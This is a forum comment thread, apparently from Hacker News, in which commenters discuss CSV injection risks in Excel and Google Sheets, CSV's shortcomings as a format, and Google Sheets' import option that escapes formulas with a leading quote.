Their policy makes it sound like the second vulnerability should indeed be fixed in Google Sheets itself (it is the one opening the file, after all).

jonnycomputer8y ago

CSV is a mess (are a mess?), but all these vulnerabilities have to do with spreadsheet applications' consumption of CSVs. There are very legitimate reasons a CSV might include fragments of potentially executable code, after all.

filereaper8y ago

I'd be curious if anyone has hit exploits with CSV files and bulk ingestion into datawarehouses (eg Redshift, Greenplum, etc..) as opposed to Excel.

CSVs are still the most portable format for moving data around despite all of their evils of escaping characters, comma delimitation, etc...

A lot of old legacy systems know CSV, and it's easy to inspect visually compared to more efficient binary formats like ORC or Parquet.

tatersolid8y ago

Like it or not, Excel’s behavior defines the CSV file format and how it is used in the real world. The writing of an RFC 15 years too late has not and will never “fix” CSV. It’s crusted over with bugs and inconsistencies for all time.

Use anything else, even XLSX which is at least a typed and openly standardized format.

stepri8y ago

When you import a CSV file into Google Sheets (File -> Import), you can choose in the dialog to convert text to numbers and dates. If you choose not to convert, Google Sheets places a single quote (') before the function.

ecesena8y ago

Does anybody know any good library that solves the problem, in any language?

jasonmaydie8y ago

Shouldn't this be the dangers of Excel? CSVs are benign.
